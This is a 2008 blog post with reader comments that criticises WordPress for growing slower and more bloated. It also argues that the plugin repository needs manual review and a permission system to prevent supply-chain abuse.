Critique View on the Future of WordPress

WordPress is today by far the most widely spread blogging platform on the Internet.

I am enjoying using WordPress since I made it my "weapon of choice" over Moveable Type and Drupal. I spent lot of time with WordPress and just love it.

But that also gives me an opportunity to express some of my concerns regarding the current state of WordPress and the future direction it may be heading. You often get the best critique from those who love you the most.

WordPress in Transition

With the rules-changing version 2.5 out couple of months ago, and a current transitional 2.6 we are headed for another rules-changing version of 2.7. It will have new admin interface and integrate functionality of several popular plugins.

As many other developers, I have been carefully following this progress and I can tell that new versions brought certain compatibility issues. Maintaining support for just a couple of plugins has become almost a full time job, one you as a plugin developer, are usually not paid for. You can see that by taking a look at my plugin comments and the forum which I opened specifically to deal with the support questions more efficiently.

Far and Wide development

But more importantly, I have noticed that WordPress is not developing "far" anymore, and it started going "wide" instead. By this I mean there are less inventions and new technologies with every update. There is just more functionality that relies on current existing technologies.

That makes the code base grow and harder to manage, and presents the users with default solutions to their problems.

Speed and Choices Theory

I have a theory that I call "Speed and Choices Theory". It says that the faster software is, while giving more choices to the user, the more successful it is likely to be with the user base. It generally applies to life but in this example I apply it to WordPress.

Google and Yahoo Battle

To illustrate this, I'll compare Google and Yahoo way back in 1996.

Both were search engines and both were fighting for the number one spot. We all know who won, but how did Google pull it off?

Google set a goal to present search results to the user in no more then half a second. 0.5 seconds is all the user had to wait in order to find what they needed. Yahoo was much slower and it lost the first battle.

Yahoo also decided to fit all kind of content on their home page, something that will later become Yahoo directory and it basically offered default choices for the things you may be looking for.

If you wanted to find out more about a topic, you would find a site about it, recommended by Yahoo. That approach has a good side for cleaning out the spam, but on the other hand the user is deprived of choices - they are forced upon. And so the Yahoo lost that battle as well.

Speed and choices are everything on the Internet today..

WordPress is Slowing Down

WordPress started out like Google, but is now becoming more and more like Yahoo. It stopped going "far" and started becoming fat ("wide"). It is becoming slow and clumsy.

Did you notice how much time you need to load the Write Post screen? How about adding an Image? Why isn't this instantaneous?

The user has less choices with every new version as certain default solutions are implemented.

Take a look at Chrome, the new browser from Google.

Take a look at Habari, the new and different blogging platform.

Ideally we want a very fast and secure software that handles the basic purpose it was made for.

Since every user has different needs, every other functionality should be handled by external additions (plugins), leaving the core extremely small, efficient and scalable.

Even at this time I would say that 95% of users use only 5% of WordPress core functionality, mostly very simple tasks like writing a post and perhaps managing comments. With new version like 2.7 this may shift to 97% and 3%.

Plugins in the Danger Zone

There are almost 3,000 plugins in the WordPress plugin repository at this time, downloaded almost 12,000,000 times. And anyone can submit a plugin to the repository. Without any control.

So what implications does that have?

A plugin that you run on your blog has (depending on your hosting server) almost full control of your website. It can change your WordPress site and change your theme files. It can insert hidden code into your pages. It can change your pages, it can copy and move files on your server and in some cases it can even delete them. Every single plugin you have on your blog is capable of doing this.

By installing a plugin you are giving it the ultimate authority to do whatever its author wants.

Would you trust a house to a complete stranger?

How many plugins do you have? A typical user will most likely have around 10-15 plugins. What do you know about them? Typical user knows almost next to nothing.

Privacy and Security Issues

Privacy and security implications of plugins shared that way are enormous.

While you can be pretty sure that the core WordPress will be free off any kind of malicious behavior (well there is at least a company to sue), whom to blame if you suddenly found out that a certain plugin is sending your private information to a foreign server?

Surely, such thing would be discovered quickly, but even new and totally anonymous plugins get downloaded hundreds if not thousands of times by all sorts of users, including those that would never find out about this security issue. The potential for damage is huge.

Nightmare Scenario

For example, if someone would got my password for plugin repository and let's say changed Smart Youtube plugin and updated new version, around 30,000 people might automatically update it (because they trust this core function) and now have a malicious plugin running on their blog. It could install a web-virus, privacy information tracker or simply delete all your files.

What if that happened to All in One SEO pack plugin, the most downloaded WordPress plugin with almost 400,000 installations?

Secure WordPress

Obviously this matter needs proper and most urgent care, as the way it works now is a recipe for disaster waiting to happen.

The theme repository manually approves every theme, even every update, before allowing it into the repository. The plugin repository, which is a potential source of much graver risk, doesn't.

Stricter rules

We need to have stricter rules for plugins. Start with coding standards and inform the developers of proper and transparent ways to handle things in plugins. Then manually inspect every plugin with aspiration to get accepted to the official plugin repository.

We need a permissions system for plugins (similar to user capabilities). These would be plugin capabilities. They would define what is a plugin able to do in your system. The plugins inspected by WordPress repository would get the highest ranking. The less trusted plugins would have restricted access within your WordPress. And you as a user should be able to control the "trust" level of each plugin.

Let the user make choices on what to install. If they decide to install a plugin from WordPress.org, we need to make sure it's not compromising. If they decide to install it from any other site, they shall be aware of the risks for doing so.

We trust too much the good-intention of Internet users but not all are equal. WordPress has spread enough by this time to become an interesting target for a large scale ill-minded attack. It is a grave prospect but it's not fictional.

Get Back on the "Far" Track

Future is about inventions, not interventions. More speed, security and choices.

Future lies in simplicity. Let's reinvent the famous one-click install.

WordPress is too good to miss the chance to make it even better.


More like this:


Posted in: WordPress
TAGS:, , , , , , , , , , , , , , ,
Both comments and trackbacks are currently closed.

16 Comments

  1. Mar 26th, 2009 6:31 PM

    WP is nice and all, i just hope they keep improving it and that a new release is in the works.

  2. Jan 17th, 2009 2:12 AM

    I enjoyed your rant. One thing you didn't mention, though, is that the "expansion" or "fatness" of WordPress is removing much of the need for plugins. That to me is a lifesaver.

    With WordPress 2.7, I've essentially ditched all but a few plugins (I only use five plugins). This makes things far easier, more secure and, just as importantly if you want to experiment with some of the 1000's of pre-made WordPress themes...compatible.

    Additionally, I've had too many plugins that I relied on in the past just "vanish into the night," essentially rendering the pages that depended on them useless when I upgraded to new versions of WordPress (only to discover the plugins weren't compatible). Right now my site isn't dependent on any plugin at all, something I rather like. The site is enhanced by the handful of plugins I use, but it is no longer dependent on it (like when I relied on several photo gallery type plugins).

    I personally will take a bit "more fat" if that leads to features that remove the need for dozens of plugins.

  3. Oct 10th, 2008 9:42 AM

    I 100% agree with plugin repository issue. An awful lot of damage could be done with a stolen password.

    I'm particularly wary of some prat deciding to 'buy' a popular plugin from someone or even volunteering to take over the development. Imagine if the development of a major plugin was passed on to a spammer! The potential of serious damage to people's blogs, not to mention the reputation of WordPress, could be enormous.

    I disagree about the bloat issue though. My concerns are mainly with not introducing new bugs (HTML bugs in the gallery and admin panel CSS bugs in particular). The new features added of late and the new ones in the pipeline all seem reasonable to me. The core is still being kept fairly small. Having the core functionality makes it easier to add more advanced functionality to the system. For example, to build an advanced photos gallery you don't need to build in the basic functionality, you can build on top of the core system hence making it easier to setup and maintain. So in a way the new core features are making it easier for developers to create new and interesting plugins.

    It doesn't look like WordPress is intending to go down the Joomla route of adding everything imagineable to the core - and thankfully so!

  4. Oct 7th, 2008 10:10 PM

    10 to 15 plug-ins?

    I just checked, I have 146.
    Only about a third are active...

    I actually remember a poorly written plug in that was allowing me to customize my RSS feed with a copyright statement.

    I had to send an email to the developer to tell him that it seems that every single of my logged in guests could do the exact same thing: change the copyright in my feed!

  5. Sep 20th, 2008 12:23 PM

    Great post, and I concur - speed and simplicity with some choice features, not bloat.

    Saying that, I don't know anything other then WP!

  6. Sep 15th, 2008 2:10 PM

    You're absolutely right about further development of WordPress. It should stay the way it was: simple to use and reliable at the first place. I was just impressed when I discovered WordPress after spending a whole summer holliday (in Tunesia with my family, bored to death there) trying to learn how to use Joomla! It was so complicated that I gave up! It seamed to me (at that point) that it would be easyer to develop my own CMS than to learn one mentioned above! Now, after upgrades to 2.6 I'm getting scared after each updated version of WordPress - what's gonna happen now and am I going to study the new functions like I'd never used it before!

  7. Sep 13th, 2008 9:07 PM

    Odlična kritika!

  8. Sep 12th, 2008 9:55 PM

    Rudy, first 2.3 is insecure and you'll probably get hacked if you stay on it.

    But just as important - 2.3 is more bloatware than 2.6. We've learned *a ton* from serving billions of pageviews on WordPress.com and with each subsequent release we make it faster and more efficient despite adding new features. If WP gets 10% slower that means I have to order 80 new servers for WordPress.com to serve the same number of servers.

  9. Sep 12th, 2008 7:31 PM

    WordPress. Cannot live with it, cannot live without it...

    What bothers me most is when you put 2000 or so categories in the fresh installation, the Admin panels simply stop or function extremely slow. If you go to Manage Posts, or anything similar, the WP just ... dies.

    But we all still like it, and still use it, and plan to continue using it, and recommending it to anyone!

    That is WordPress.

    Ivan | SeoConsultant.ie

  10. Sep 12th, 2008 12:42 PM

    Excellent article with some well-made points. While I am eternally grateful to Matt for his contribution of WordPress, it does have room for improvement, as do all things. The speed issue is problem for sure, but I had not given any thought to the plugin issue. Plugins also seem to slow the whole thing down, so I only use 2-3 at a time. (Matt, WordPress has changed the world, and it is refreshing to see your attitude about constructive criticism. You're remarkable.)

  11. Sep 11th, 2008 7:34 PM

    I would love to see WordPress do what Apple is doing with Snow Leopard - far fewer new features, greater emphasis on speed, stability and security. Not every new version needs to be a news maker, you know? WordPress has definitely evolved to the point where security and speed need to take center stage for a release or two.

  12. Sep 11th, 2008 11:35 AM

    Hey Vladimir

    That was one of the most interesting things I have read in a long time :) Thanks Dave

  13. Sep 10th, 2008 9:50 AM

    Matt: Thanks for joining in and considering the issues I was talking about. Great to have you as first commenter on the topic.

    I am very glad to hear you are speed obsessed, I know that's a special kind of developers and I am relieved to hear that. Speed is everything, it makes or breaks it.

    I am also very relieved to find out about integrated control mechanism you talked about, actually this was my biggest concern. I would be happy to join the effort of further securing WP repository. My email: vprelovac@gmail.com

    Kym: Thanks mate.

  14. Sep 10th, 2008 6:48 AM

    Good post Vlad. I've noticed myself the speed issue as of late.

    One of the things that drew me to WP was how fast and simple it was. Even with the gears option activated, the write page load is simply too long for me. Not to mention the image uploading - gosh...

    It's great to see the WP team and Matt working on improving things however. :)

    WP has a strong community behind it and it is posts like these that help it constantly improve.

  15. Sep 10th, 2008 3:01 AM

    I'm obsessed with speed. On the backend WP has done a ton to speed itself up, as evidenced by the fact that it now runs the largest blogs in the world. More than 1.6 billion pageviews a month are going through WordPress.

    However front-end performance is where the future is, as you mentioned the delay in loading the write page. Gears, where we've invested time, helps a ton, but there's still a lot more we can do. The good news is some of the best people in the industry are working on this problem specifically as it pertains to WordPress.

    The plugin issue is one I've thought of a lot. Luckily since we have the central repository we actually have a lot of control and protection. There are some automated things we do to watch out for bad stuff but ultimately I think we need a human team of volunteers to keep an eye on plugin changesets. Is this something you'd be interested in helping out with?

  16. Sep 9th, 2008 9:38 PM

    You got it right with WP going fat. A lot of people have been complaining about WP being a bloatware in the first place, now they're just confirming it. I'm still sticking with WP 2.3, and with all the plugins I'm running, it's already a bloatware.

    As long as it's secure and in working condition, I'm not going to upgrade.